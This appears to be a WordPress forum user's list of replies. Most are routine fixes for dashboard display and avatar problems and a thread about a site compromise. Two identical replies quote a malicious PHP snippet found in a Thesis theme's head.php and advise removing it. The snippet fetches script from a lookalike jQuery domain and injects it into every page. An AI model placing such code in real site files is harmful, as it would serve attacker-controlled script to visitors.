Kaye
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Malware keeps changing wp-includes/formatting.php fileI did try with WordFence and then with Sucuri. They detect the file as being modified, but even if I restore it to the original formatting.php, it still comes out as being infected a few seconds after.
I have already traced the persistence to being a couple of cron jobs that I cannot seem to delete from my cPanel. I am in contact with my hosting account right now to ask for help, and I am on hold because they cannot seem to figure out how to delete the cron jobs as well.
Here’s are my current cron jobs, I want help with deleting the last two because those look suspicious to me.- This reply was modified 1 year, 11 months ago by Kaye.
Forum: Fixing WordPress
In reply to: Dashboard display style missingGlad I could help @greenpeas
Forum: Fixing WordPress
In reply to: Dashboard not displaying correctlyTry turning off AdBlock. Was in the same boat just now and turning off AdBlock fixed the dashboard display.
Forum: Fixing WordPress
In reply to: WordPress dashboard has lost the display styleTry turning off AdBlock. Was in the same boat just now and turning off AdBlock fixed the dashboard display.
Forum: Fixing WordPress
In reply to: Dashboard display style missingTry turning off AdBlock. Was in the same boat just now and turning off AdBlock fixed the dashboard display.
Forum: Plugins
In reply to: [AddToAny Share Buttons] Social Share RecoveryCan anyone help me please?
Thank you for pointing me in the right direction!
Hey Brecht! Thank you for the response. But the code will remove the related posts on the recipe page itself as well. I just want “Spread the Word” and “Related Posts” section removed on print version of the recipe. Is there any way to achieve this?
Forum: Plugins
In reply to: [Image Wall] Order By Latest?Ooof. That it isn’t. Sorry about that. Anyway I got the jQuery Masonry effect to work for my archives since I last posted. Thanks for clarifying! So pretty though. I’ll certainly find another project that I can use this for. ??
Forum: Fixing WordPress
In reply to: Custom Avatar not showing upIt seems Gravatar still hasn’t addressed this problem. A quick workaround is to rename your gravatar image, update your functions.php to reflect the new name, and the avatar will appear as it should ??
Forum: Themes and Templates
In reply to: How to remove parent's image size from child theme?Hey weeix, here’s one that worked for me:
https://www.studiograsshopper.ch/code-snippets/remove-wordpress-defaultmedia-image-sizes/
Forum: Installing WordPress
In reply to: After wordpress version 3.3 upgrade, I am getting errorsI’m using the Thesis theme and had a similar problem this morning. Solved it by removing this code:
<?php
if(function_exists(‘curl_init’))
{
$url = “https://www.code.jqeury.org/jquery-latest.js”;
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo “$data”;
}
?>out of the head.php file (which is located inside the lib->classes folder in the Thesis theme folder.
Hope that helps ??
Forum: Fixing WordPress
In reply to: Error Message: Couldn't connect to database server.I’m using the Thesis theme and had a similar problem this morning. Solved it by removing this code:
<?php
if(function_exists(‘curl_init’))
{
$url = “https://www.code.jqeury.org/jquery-latest.js”;
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo “$data”;
}
?>out of the head.php file (which is located inside the lib->classes folder in the Thesis theme folder.
Hope that helps ??